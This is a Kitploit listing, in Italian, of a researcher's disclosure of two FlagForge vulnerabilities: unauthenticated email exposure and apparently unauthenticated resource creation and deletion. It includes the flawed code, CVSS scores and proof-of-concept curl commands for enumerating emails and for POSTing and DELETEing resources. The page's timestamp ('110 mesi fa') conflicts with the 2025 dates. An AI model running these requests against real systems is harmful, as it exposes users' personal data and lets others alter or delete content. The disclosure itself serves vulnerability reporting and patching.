Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59843-CVE-2025-59932 — CVE su FlagForge nelle versioni da 2.0.0 a 2.3.0. Aggiornare alla versione 2.3.1 per risolvere il problema. | Kitploit
Strumenti/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
Analisi delle VulnerabilitàRaccolta InformazioniSicurezza WebPenetration TestingConfigurazione ErrataSicurezza delle API
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

CVE su FlagForge nelle versioni da 2.0.0 a 2.3.0. Aggiornare alla versione 2.3.1 per risolvere il problema.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
110 mesi faNon ancora revisionato

CVE-2025-59843 & CVE-2025-59932

1. Esposizione Pubblica degli Indirizzi Email degli Utenti CVE-2025-59843

Ambito / Applicazione Interessata: FlagForge Web Application

Endpoint API: /api/user/[username]

Dettagli: L'endpoint restituisce gli indirizzi email degli utenti senza autenticazione. Qualsiasi username può essere interrogato pubblicamente.

Causa Principale / Riferimento Codice:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

Gravità (CVSS v4.0): 5.5 (Media)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

Impatto: Gli attaccanti possono enumerare gli utenti e accedere agli indirizzi email, portando a potenziali violazioni della privacy.

Prova di Concetto (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Sample Response:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. Potenziale Modifica/Cancellazione di Risorsa non Autenticata CVE-2025-59932

Ambito / Applicazione Interessata: FlagForge Web Application

Endpoint API: /api/resources

Dettagli:

GET /api/resources espone pubblicamente tutte le risorse.

Sulla base della revisione del codice, le richieste POST e DELETE non impongono autenticazione o autorizzazione. Queste richieste non sono state testate sul sistema live per evitare di impattare i dati di produzione.

Intestazioni osservate (richiesta OPTIONS):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

Gravità (CVSS v4.0, se POST/DELETE non sono autenticati): 7.8 (Alta)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

Impatto: Se POST o DELETE non sono autenticati, un attaccante potrebbe potenzialmente creare o eliminare risorse, compromettendo l'integrità della piattaforma.

Prova di Concetto (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

Questo restituirà l'_id delle risorse.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

Scarica lo strumento